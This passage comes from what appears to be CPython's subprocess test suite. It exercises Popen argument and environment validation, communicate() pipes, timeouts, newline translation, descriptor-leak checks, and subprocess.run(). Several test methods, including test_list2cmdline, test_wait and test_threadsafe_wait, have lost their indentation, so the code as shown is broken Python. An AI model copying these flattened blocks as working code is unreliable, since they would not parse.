        with self.assertRaises(ValueError):
            subprocess.Popen([cmd, "-c", "pass"])

        # null character in the command argument
        with self.assertRaises(ValueError):
            subprocess.Popen([sys.executable, "-c", "pass#\0"])
    def test_invalid_env(self):
        """NUL bytes and '=' in env names/values raise ValueError where invalid.

        A '=' inside a *value* is legal and must round-trip to the child.
        """
        # null character in the environment variable name
        newenv = os.environ.copy()
        newenv["FRUIT\0VEGETABLE"] = "cabbage"
        with self.assertRaises(ValueError):
            subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)

        # null character in the environment variable value
        newenv = os.environ.copy()
        newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
        with self.assertRaises(ValueError):
            subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)

        # equal character in the environment variable name
        newenv = os.environ.copy()
        newenv["FRUIT=ORANGE"] = "lemon"
        with self.assertRaises(ValueError):
            subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)

        # equal character in the environment variable value
        newenv = os.environ.copy()
        newenv["FRUIT"] = "orange=lemon"
        with subprocess.Popen([sys.executable, "-c",
                               'import sys, os;'
                               'sys.stdout.write(os.getenv("FRUIT"))'],
                              stdout=subprocess.PIPE,
                              env=newenv) as p:
            stdout, stderr = p.communicate()
            self.assertEqual(stdout, b"orange=lemon")
    def test_communicate_stdin(self):
        """communicate(input=...) feeds the child's stdin and closes it."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.exit(sys.stdin.read() == "pear")'],
                             stdin=subprocess.PIPE)
        p.communicate(b"pear")
        # sys.exit(True) maps to exit status 1.
        self.assertEqual(p.returncode, 1)
    def test_communicate_stdout(self):
        """communicate() returns stdout bytes; stderr is None when not piped."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys; sys.stdout.write("pineapple")'],
                             stdout=subprocess.PIPE)
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout, b"pineapple")
        self.assertEqual(stderr, None)
    def test_communicate_stderr(self):
        """communicate() returns stderr bytes; stdout is None when not piped."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys; sys.stderr.write("pineapple")'],
                             stderr=subprocess.PIPE)
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout, None)
        self.assertStderrEqual(stderr, b"pineapple")
    def test_communicate(self):
        """communicate() round-trips input to stdout with all three pipes set."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stderr.write("pineapple");'
                              'sys.stdout.write(sys.stdin.read())'],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        (stdout, stderr) = p.communicate(b"banana")
        self.assertEqual(stdout, b"banana")
        self.assertStderrEqual(stderr, b"pineapple")
    def test_communicate_timeout(self):
        """communicate(timeout=...) raises TimeoutExpired, then a later
        communicate() still delivers the child's complete output."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os,time;'
                              'sys.stderr.write("pineapple\\n");'
                              'time.sleep(1);'
                              'sys.stderr.write("pear\\n");'
                              'sys.stdout.write(sys.stdin.read())'],
                             universal_newlines=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
                          timeout=0.3)
        # Make sure we can keep waiting for it, and that we get the whole output
        # after it completes.
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout, "banana")
        self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
    def test_communicate_timeout_large_output(self):
        """A timeout that fires mid-output must not lose any child data."""
        # Test an expiring timeout while the child is outputting lots of data.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os,time;'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'],
                             stdout=subprocess.PIPE)
        self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
        # The second communicate() must return the full 4 x 64 KiB.
        (stdout, _) = p.communicate()
        self.assertEqual(len(stdout), 4 * 64 * 1024)
    # Test for the fd leak reported in http://bugs.python.org/issue2791.
    def test_communicate_pipe_fd_leak(self):
        """communicate() must close every PIPE it owns (issue #2791).

        Exercises all 7 non-empty combinations of stdin/stdout/stderr
        pipes and checks each created stream is closed afterwards.
        """
        for stdin_pipe in (False, True):
            for stdout_pipe in (False, True):
                for stderr_pipe in (False, True):
                    options = {}
                    if stdin_pipe:
                        options['stdin'] = subprocess.PIPE
                    if stdout_pipe:
                        options['stdout'] = subprocess.PIPE
                    if stderr_pipe:
                        options['stderr'] = subprocess.PIPE
                    if not options:
                        # No pipes at all: nothing to leak, skip.
                        continue
                    p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
                    p.communicate()
                    if p.stdin is not None:
                        self.assertTrue(p.stdin.closed)
                    if p.stdout is not None:
                        self.assertTrue(p.stdout.closed)
                    if p.stderr is not None:
                        self.assertTrue(p.stderr.closed)
    def test_communicate_returns(self):
        """communicate() returns (None, None) when nothing is redirected."""
        # communicate() should return None if no redirection is active
        p = subprocess.Popen([sys.executable, "-c",
                              "import sys; sys.exit(47)"])
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout, None)
        self.assertEqual(stderr, None)
    def test_communicate_pipe_buf(self):
        """communicate() handles writes larger than the OS pipe buffer.

        A broken implementation deadlocks here rather than failing.
        """
        # communicate() with writes larger than pipe_buf
        # This test will probably deadlock rather than fail, if
        # communicate() does not work properly.
        x, y = os.pipe()
        os.close(x)
        os.close(y)
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(sys.stdin.read(47));'
                              'sys.stderr.write("x" * %d);'
                              'sys.stdout.write(sys.stdin.read())' %
                              support.PIPE_MAX_SIZE],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        string_to_write = b"a" * support.PIPE_MAX_SIZE
        (stdout, stderr) = p.communicate(string_to_write)
        self.assertEqual(stdout, string_to_write)
    def test_writes_before_communicate(self):
        """Data written to p.stdin before communicate() is not lost."""
        # stdin.write before communicate()
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(sys.stdin.read())'],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        p.stdin.write(b"banana")
        (stdout, stderr) = p.communicate(b"split")
        self.assertEqual(stdout, b"bananasplit")
        self.assertStderrEqual(stderr, b"")
    def test_universal_newlines_and_text(self):
        """universal_newlines=True and text=True behave identically:
        child pipes are text streams and \\r / \\r\\n are translated to \\n."""
        args = [
            sys.executable, "-c",
            'import sys,os;' + SETBINARY +
            'buf = sys.stdout.buffer;'
            'buf.write(sys.stdin.readline().encode());'
            'buf.flush();'
            'buf.write(b"line2\\n");'
            'buf.flush();'
            'buf.write(sys.stdin.read().encode());'
            'buf.flush();'
            'buf.write(b"line4\\n");'
            'buf.flush();'
            'buf.write(b"line5\\r\\n");'
            'buf.flush();'
            'buf.write(b"line6\\r");'
            'buf.flush();'
            'buf.write(b"\\nline7");'
            'buf.flush();'
            'buf.write(b"\\nline8");']

        # Run the same scenario once per spelling of the text-mode flag.
        for extra_kwarg in ('universal_newlines', 'text'):
            p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
                                          'stdout': subprocess.PIPE,
                                          extra_kwarg: True})
            with p:
                p.stdin.write("line1\n")
                p.stdin.flush()
                self.assertEqual(p.stdout.readline(), "line1\n")
                p.stdin.write("line3\n")
                p.stdin.close()
                self.addCleanup(p.stdout.close)
                self.assertEqual(p.stdout.readline(),
                                 "line2\n")
                self.assertEqual(p.stdout.read(6),
                                 "line3\n")
                self.assertEqual(p.stdout.read(),
                                 "line4\nline5\nline6\nline7\nline8")
    def test_universal_newlines_communicate(self):
        """communicate() translates \\r / \\r\\n to \\n in text mode."""
        # universal newlines through communicate()
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY +
                              'buf = sys.stdout.buffer;'
                              'buf.write(b"line2\\n");'
                              'buf.flush();'
                              'buf.write(b"line4\\n");'
                              'buf.flush();'
                              'buf.write(b"line5\\r\\n");'
                              'buf.flush();'
                              'buf.write(b"line6\\r");'
                              'buf.flush();'
                              'buf.write(b"\\nline7");'
                              'buf.flush();'
                              'buf.write(b"\\nline8");'],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=1)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout,
                         "line2\nline4\nline5\nline6\nline7\nline8")
    def test_universal_newlines_communicate_stdin(self):
        """Text-mode communicate() works when only stdin is a pipe."""
        # universal newlines through communicate(), with only stdin
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY + textwrap.dedent('''
                               s = sys.stdin.readline()
                               assert s == "line1\\n", repr(s)
                               s = sys.stdin.read()
                               assert s == "line3\\n", repr(s)
                              ''')],
                             stdin=subprocess.PIPE,
                             universal_newlines=1)
        (stdout, stderr) = p.communicate("line1\nline3\n")
        self.assertEqual(p.returncode, 0)
    def test_universal_newlines_communicate_input_none(self):
        """communicate(input=None) is valid in text mode."""
        # Test communicate(input=None) with universal newlines.
        #
        # We set stdout to PIPE because, as of this writing, a different
        # code path is tested when the number of pipes is zero or one.
        p = subprocess.Popen([sys.executable, "-c", "pass"],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=True)
        p.communicate()
        self.assertEqual(p.returncode, 0)
    def test_universal_newlines_communicate_stdin_stdout_stderr(self):
        """Text-mode communicate() translates newlines on all three pipes."""
        # universal newlines through communicate(), with stdin, stdout, stderr
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY + textwrap.dedent('''
                               s = sys.stdin.buffer.readline()
                               sys.stdout.buffer.write(s)
                               sys.stdout.buffer.write(b"line2\\r")
                               sys.stderr.buffer.write(b"eline2\\n")
                               s = sys.stdin.buffer.read()
                               sys.stdout.buffer.write(s)
                               sys.stdout.buffer.write(b"line4\\n")
                               sys.stdout.buffer.write(b"line5\\r\\n")
                               sys.stderr.buffer.write(b"eline6\\r")
                               sys.stderr.buffer.write(b"eline7\\r\\nz")
                              ''')],
                             stdin=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=True)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        (stdout, stderr) = p.communicate("line1\nline3\n")
        self.assertEqual(p.returncode, 0)
        self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # Python debug build push something like "[42442 refs]\n"
        # to stderr at exit of subprocess.
        # Don't use assertStderrEqual because it strips CR and LF from output.
        self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
    def test_universal_newlines_communicate_encodings(self):
        """Newline translation works with multi-byte encodings (issue #15595)."""
        # Check that universal newlines mode works for various encodings,
        # in particular for encodings in the UTF-16 and UTF-32 families.
        # See issue #15595.
        #
        # UTF-16 and UTF-32-BE are sufficient to check both with BOM and
        # without, and UTF-16 and UTF-32.
        for encoding in ['utf-16', 'utf-32-be']:
            code = ("import sys; "
                    r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
                    encoding)
            args = [sys.executable, '-c', code]
            # We set stdin to be non-None because, as of this writing,
            # a different code path is used when the number of pipes is
            # zero or one.
            popen = subprocess.Popen(args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     encoding=encoding)
            stdout, stderr = popen.communicate(input='')
            self.assertEqual(stdout, '1\n2\n3\n4')
    def test_communicate_errors(self):
        """errors= controls how undecodable child output is handled."""
        for errors, expected in [
            ('ignore', ''),
            ('replace', '\ufffd\ufffd'),
            ('surrogateescape', '\udc80\udc80'),
            ('backslashreplace', '\\x80\\x80'),
        ]:
            # The child emits two bytes (0x80 0x80) that are invalid UTF-8.
            code = ("import sys; "
                    r"sys.stdout.buffer.write(b'[\x80\x80]')")
            args = [sys.executable, '-c', code]
            # We set stdin to be non-None because, as of this writing,
            # a different code path is used when the number of pipes is
            # zero or one.
            popen = subprocess.Popen(args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     encoding='utf-8',
                                     errors=errors)
            stdout, stderr = popen.communicate(input='')
            self.assertEqual(stdout, '[{}]'.format(expected))
    def test_no_leaking(self):
        """Repeated Popen+communicate must not leak file descriptors.

        Exhausts nearly all available fds first, then repeatedly spawns
        children; a per-iteration leak would hit the fd limit and fail.
        """
        # Make sure we leak no resources
        if not mswindows:
            max_handles = 1026 # too much for most UNIX systems
        else:
            max_handles = 2050 # too much for (at least some) Windows setups
        handles = []
        tmpdir = tempfile.mkdtemp()
        try:
            for i in range(max_handles):
                try:
                    tmpfile = os.path.join(tmpdir, support.TESTFN)
                    handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
                except OSError as e:
                    if e.errno != errno.EMFILE:
                        raise
                    break
            else:
                self.skipTest("failed to reach the file descriptor limit "
                              "(tried %d)" % max_handles)
            # Close a couple of them (should be enough for a subprocess)
            for i in range(10):
                os.close(handles.pop())
            # Loop creating some subprocesses. If one of them leaks some fds,
            # the next loop iteration will fail by reaching the max fd limit.
            for i in range(15):
                p = subprocess.Popen([sys.executable, "-c",
                                      "import sys;"
                                      "sys.stdout.write(sys.stdin.read())"],
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE)
                data = p.communicate(b"lime")[0]
                self.assertEqual(data, b"lime")
        finally:
            # Release everything we grabbed so later tests have fds again.
            for h in handles:
                os.close(h)
            shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
    def test_poll(self):
        """poll() returns None while running, then the cached returncode."""
        p = subprocess.Popen([sys.executable, "-c",
                              "import os; os.read(0, 1)"],
                             stdin=subprocess.PIPE)
        self.addCleanup(p.stdin.close)
        self.assertIsNone(p.poll())
        # Unblock the child's os.read() so it can exit.
        os.write(p.stdin.fileno(), b'A')
        p.wait()
        # Subsequent invocations should just return the returncode
        self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
    def test_wait_timeout(self):
        """wait(timeout=...) raises TimeoutExpired naming the timeout value."""
        p = subprocess.Popen([sys.executable,
                              "-c", "import time; time.sleep(0.3)"])
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            p.wait(timeout=0.0001)
        self.assertIn("0.0001", str(c.exception))  # For coverage of __str__.
        # Some heavily loaded buildbots (sparc Debian 3.x) require this much
        # time to start.
        self.assertEqual(p.wait(timeout=3), 0)
    def test_invalid_bufsize(self):
        """A non-integer bufsize raises TypeError."""
        # an invalid type of the bufsize argument should raise
        # TypeError.
        with self.assertRaises(TypeError):
            subprocess.Popen([sys.executable, "-c", "pass"], "orange")
    def test_bufsize_is_none(self):
        """bufsize=None is accepted, both positionally and by keyword."""
        # bufsize=None should be the same as bufsize=0.
        p = subprocess.Popen([sys.executable, "-c", "pass"], None)
        self.assertEqual(p.wait(), 0)
        # Again with keyword arg
        p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
        self.assertEqual(p.wait(), 0)
    def _test_bufsize_equal_one(self, line, expected, universal_newlines):
        """Write *line* to a bufsize=1 child and assert readline() == *expected*.

        bufsize=1 means line-buffered in text mode but is treated as
        unbuffered-adjacent in binary mode; see issue #21332.
        """
        # subprocess may deadlock with bufsize=1, see issue #21332
        with subprocess.Popen([sys.executable, "-c", "import sys;"
                               "sys.stdout.write(sys.stdin.readline());"
                               "sys.stdout.flush()"],
                              stdin=subprocess.PIPE,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL,
                              bufsize=1,
                              universal_newlines=universal_newlines) as p:
            p.stdin.write(line)  # expect that it flushes the line in text mode
            os.close(p.stdin.fileno())  # close it without flushing the buffer
            read_line = p.stdout.readline()
            with support.SuppressCrashReport():
                try:
                    # The fd is already closed; this may legitimately fail.
                    p.stdin.close()
                except OSError:
                    pass
            # Prevent Popen.__exit__ from touching the dead stdin again.
            p.stdin = None
        self.assertEqual(p.returncode, 0)
        self.assertEqual(read_line, expected)
    def test_bufsize_equal_one_text_mode(self):
        """bufsize=1 in text mode is line-buffered: the full line arrives."""
        # line is flushed in text mode with bufsize=1.
        # we should get the full line in return
        line = "line\n"
        self._test_bufsize_equal_one(line, line, universal_newlines=True)
    def test_bufsize_equal_one_binary_mode(self):
        """bufsize=1 in binary mode does not line-flush: nothing arrives."""
        # line is not flushed in binary mode with bufsize=1.
        # we should get empty response
        line = b'line' + os.linesep.encode() # assume ascii-based locale
        self._test_bufsize_equal_one(line, b'', universal_newlines=False)
    def test_leaking_fds_on_error(self):
        """A failing Popen must not leak its PIPE fds (bug #5179)."""
        # see bug #5179: Popen leaks file descriptors to PIPEs if
        # the child fails to execute; this will eventually exhaust
        # the maximum number of open fds. 1024 seems a very common
        # value for that limit, but Windows has 2048, so we loop
        # 1024 times (each call leaked two fds).
        for i in range(1024):
            with self.assertRaises(NONEXISTING_ERRORS):
                subprocess.Popen(NONEXISTING_CMD,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
    def test_nonexisting_with_pipes(self):
        """Failing Popen with pipes must close them cleanly (bpo-30121).

        Windows-specific (requires msvcrt.CrtSetReportMode); runs the
        scenario in a subprocess so CRT error reports land on stderr
        where they can be asserted empty.
        """
        # bpo-30121: Popen with pipes must close properly pipes on error.
        # Previously, os.close() was called with a Windows handle which is not
        # a valid file descriptor.
        #
        # Run the test in a subprocess to control how the CRT reports errors
        # and to get stderr content.
        try:
            import msvcrt
            msvcrt.CrtSetReportMode
        except (AttributeError, ImportError):
            self.skipTest("need msvcrt.CrtSetReportMode")

        code = textwrap.dedent(f"""
            import msvcrt
            import subprocess

            cmd = {NONEXISTING_CMD!r}

            for report_type in [msvcrt.CRT_WARN,
                                msvcrt.CRT_ERROR,
                                msvcrt.CRT_ASSERT]:
                msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
                msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)

            try:
                subprocess.Popen(cmd,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            except OSError:
                pass
        """)
        cmd = [sys.executable, "-c", code]
        proc = subprocess.Popen(cmd,
                                stderr=subprocess.PIPE,
                                universal_newlines=True)
        with proc:
            stderr = proc.communicate()[1]
        # Any CRT complaint about an invalid fd would appear here.
        self.assertEqual(stderr, "")
        self.assertEqual(proc.returncode, 0)
    def test_double_close_on_error(self):
        """A failing Popen must not close fds it does not own (issue #18851).

        A background thread keeps opening pipes while Popen fails; if
        Popen double-closed an fd it could hit one of the thread's new
        fds, which the final os.close() sweep would then detect.
        """
        # Issue #18851
        fds = []
        def open_fds():
            for i in range(20):
                fds.extend(os.pipe())
                time.sleep(0.001)
        t = threading.Thread(target=open_fds)
        t.start()
        try:
            with self.assertRaises(EnvironmentError):
                subprocess.Popen(NONEXISTING_CMD,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            t.join()
            exc = None
            for fd in fds:
                # If a double close occurred, some of those fds will
                # already have been closed by mistake, and os.close()
                # here will raise.
                try:
                    os.close(fd)
                except OSError as e:
                    exc = e
            if exc is not None:
                raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
    def test_issue8780(self):
        """A grandchild inherits stdout when the child does not use stdout=PIPE."""
        # Ensure that stdout is inherited from the parent
        # if stdout=PIPE is not used
        code = ';'.join((
            'import subprocess, sys',
            'retcode = subprocess.call('
                "[sys.executable, '-c', 'print(\"Hello World!\")'])",
            'assert retcode == 0'))
        output = subprocess.check_output([sys.executable, '-c', code])
        self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
    def test_handles_closed_on_exception(self):
        """On CreateProcess failure, duplicated handles must be released.

        The temp files are closed/removed only in the except path on
        purpose: Popen(["*"]) is expected to raise OSError, after which
        removal must succeed — proving no handle is still held open.
        """
        # If CreateProcess exits with an error, ensure the
        # duplicate output handles are released
        ifhandle, ifname = tempfile.mkstemp()
        ofhandle, ofname = tempfile.mkstemp()
        efhandle, efname = tempfile.mkstemp()
        try:
           subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
                             stderr=efhandle)
        except OSError:
            os.close(ifhandle)
            os.remove(ifname)
            os.close(ofhandle)
            os.remove(ofname)
            os.close(efhandle)
            os.remove(efname)
        self.assertFalse(os.path.exists(ifname))
        self.assertFalse(os.path.exists(ofname))
        self.assertFalse(os.path.exists(efname))
    def test_communicate_epipe(self):
        """communicate() hides EPIPE when the child exits early (issue 10963)."""
        # Issue 10963: communicate() should hide EPIPE
        p = subprocess.Popen([sys.executable, "-c", 'pass'],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # The child never reads; writing 1 MiB would raise EPIPE if unmasked.
        p.communicate(b"x" * 2**20)
    def test_communicate_epipe_only_stdin(self):
        """communicate() hides EPIPE with only stdin piped (issue 10963)."""
        # Issue 10963: communicate() should hide EPIPE
        p = subprocess.Popen([sys.executable, "-c", 'pass'],
                             stdin=subprocess.PIPE)
        self.addCleanup(p.stdin.close)
        # Child has already exited before we write.
        p.wait()
        p.communicate(b"x" * 2**20)
    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                         "Requires signal.SIGUSR1")
    @unittest.skipUnless(hasattr(os, 'kill'),
                         "Requires os.kill")
    @unittest.skipUnless(hasattr(os, 'getppid'),
                         "Requires os.getppid")
    def test_communicate_eintr(self):
        """communicate() retries after EINTR from a signal (issue #12493)."""
        # Issue #12493: communicate() should handle EINTR
        def handler(signum, frame):
            pass
        old_handler = signal.signal(signal.SIGUSR1, handler)
        self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)

        args = [sys.executable, "-c",
                'import os, signal;'
                'os.kill(os.getppid(), signal.SIGUSR1)']
        for stream in ('stdout', 'stderr'):
            kw = {stream: subprocess.PIPE}
            with subprocess.Popen(args, **kw) as process:
                # communicate() will be interrupted by SIGUSR1
                process.communicate()
    # This test is Linux-ish specific for simplicity to at least have
    # some coverage.  It is not a platform specific bug.
    @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
                         "Linux specific")
    def test_failed_child_execute_fd_leak(self):
        """Test for the fork() failure fd leak reported in issue16327.

        Compares the process's /proc fd listing before and after a
        Popen subclass whose _execute_child always raises.
        """
        fd_directory = '/proc/%d/fd' % os.getpid()
        fds_before_popen = os.listdir(fd_directory)
        with self.assertRaises(PopenTestException):
            PopenExecuteChildRaises(
                    [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        # NOTE: This test doesn't verify that the real _execute_child
        # does not close the file descriptors itself on the way out
        # during an exception.  Code inspection has confirmed that.

        fds_after_exception = os.listdir(fd_directory)
        self.assertEqual(fds_before_popen, fds_after_exception)
    @unittest.skipIf(mswindows, "behavior currently not supported on Windows")
    def test_file_not_found_includes_filename(self):
        """FileNotFoundError from a missing executable names that executable."""
        with self.assertRaises(FileNotFoundError) as c:
            subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
        self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
    """Tests for the high-level subprocess.run() convenience function."""
    def run_python(self, code, **kwargs):
        """Run Python code in a subprocess using subprocess.run"""
        argv = [sys.executable, "-c", code]
        return subprocess.run(argv, **kwargs)
    def test_returncode(self):
        # call() function with sequence argument
        cp = self.run_python("import sys; sys.exit(47)")
        self.assertEqual(cp.returncode, 47)
        # check_returncode() must raise for a non-zero exit status.
        with self.assertRaises(subprocess.CalledProcessError):
            cp.check_returncode()
    def test_check(self):
        # check=True turns a non-zero exit into CalledProcessError.
        with self.assertRaises(subprocess.CalledProcessError) as c:
            self.run_python("import sys; sys.exit(47)", check=True)
        self.assertEqual(c.exception.returncode, 47)
    def test_check_zero(self):
        # check_returncode shouldn't raise when returncode is zero
        cp = self.run_python("import sys; sys.exit(0)", check=True)
        self.assertEqual(cp.returncode, 0)
    def test_timeout(self):
        # run() function with timeout argument; we want to test that the child
        # process gets killed when the timeout expires. If the child isn't
        # killed, this call will deadlock since subprocess.run waits for the
        # child.
        with self.assertRaises(subprocess.TimeoutExpired):
            self.run_python("while True: pass", timeout=0.0001)
    def test_capture_stdout(self):
        # capture stdout with zero return code
        cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stdout)
    def test_capture_stderr(self):
        cp = self.run_python("import sys; sys.stderr.write('BDFL')",
                             stderr=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stderr)
    def test_check_output_stdin_arg(self):
        # run() can be called with stdin set to a file
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        cp = self.run_python(
                "import sys; sys.stdout.write(sys.stdin.read().upper())",
                stdin=tf, stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)
    def test_check_output_input_arg(self):
        # check_output() can be called with input set to a string
        cp = self.run_python(
                "import sys; sys.stdout.write(sys.stdin.read().upper())",
                input=b'pear', stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)
    def test_check_output_stdin_with_input_arg(self):
        # run() refuses to accept 'stdin' with 'input'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        with self.assertRaises(ValueError,
              msg="Expected ValueError when stdin and input args supplied.") as c:
            output = self.run_python("print('will not be run')",
                                     stdin=tf, input=b'hare')
        # The error message must name both conflicting arguments.
        self.assertIn('stdin', c.exception.args[0])
        self.assertIn('input', c.exception.args[0])
    def test_check_output_timeout(self):
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            cp = self.run_python((
                     "import sys, time\n"
                     "sys.stdout.write('BDFL')\n"
                     "sys.stdout.flush()\n"
                     "time.sleep(3600)"),
                    # Some heavily loaded buildbots (sparc Debian 3.x) require
                    # this much time to start and print.
                    timeout=3, stdout=subprocess.PIPE)
        # Output produced before the timeout must be preserved on the error.
        self.assertEqual(c.exception.output, b'BDFL')
        # output is aliased to stdout
        self.assertEqual(c.exception.stdout, b'BDFL')
    def test_run_kwargs(self):
        # Arbitrary Popen kwargs (here: env) pass through run().
        newenv = os.environ.copy()
